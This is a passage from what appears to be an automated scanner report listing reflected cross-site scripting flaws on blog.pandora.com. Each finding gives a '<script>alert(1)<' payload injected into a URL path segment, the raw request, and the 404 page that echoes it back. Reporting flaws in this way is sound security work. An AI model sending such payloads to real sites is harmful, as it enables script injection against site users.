GET /pandora/archives76e6c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives76e6c<script>alert(1)< ...[SNIP]... |
3.424. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/texas/ |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/texasea264<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/texasea264<script>alert(1)< ...[SNIP]... |
3.425. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/utah/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora54e68<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora54e68<script>alert(1)< ...[SNIP]... |
3.426. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/utah/ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese0467<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese0467<script>alert(1)< ...[SNIP]... |
3.427. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/utah/ |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/utahcc949<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/utahcc949<script>alert(1)< ...[SNIP]... |
3.428. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracecee<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracecee<script>alert(1)< ...[SNIP]... |
3.429. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8fd5b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8fd5b<script>alert(1)< ...[SNIP]... |
3.430. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.431. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoradc6a7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoradc6a7<script>alert(1)< ...[SNIP]... |
3.432. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives893eb<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives893eb<script>alert(1)< ...[SNIP]... |
3.433. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.434. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4fa26<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4fa26<script>alert(1)< ...[SNIP]... |
3.435. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb0a1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb0a1<script>alert(1)< ...[SNIP]... |
3.436. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.437. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorada3b3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorada3b3<script>alert(1)< ...[SNIP]... |
3.438. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c3aeff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c3aeff<script>alert(1)< ...[SNIP]... |
3.439. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/20109922b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/20109922b<script>alert(1)< ...[SNIP]... |
3.440. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/117cce4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)< ...[SNIP]... |
3.441. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11 ...[SNIP]... |
3.442. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 357 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11 ...[SNIP]... |
3.443. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora75284<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora75284<script>alert(1)< ...[SNIP]... |
3.444. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c1e532<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c1e532<script>alert(1)< ...[SNIP]... |
3.445. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010b1697<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)< ...[SNIP]... |
3.446. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/112be7b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)< ...[SNIP]... |
3.447. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11 ...[SNIP]... |
3.448. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/assets_c/2010/11 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11 ...[SNIP]... |
3.449. http://blog.pandora.com/pandora/index.xml [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/index.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac1c19<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac1c19<script>alert(1)< ...[SNIP]... |
3.450. http://blog.pandora.com/pandora/index.xml [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/index.xml |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/index.xmld1051<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/index.xmld1051<script>alert(1)< ...[SNIP]... |
3.451. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/jquery.dimension |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2b6f7<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2b6f7<script>alert(1)< ...[SNIP]... |
3.452. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/jquery.dimension |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
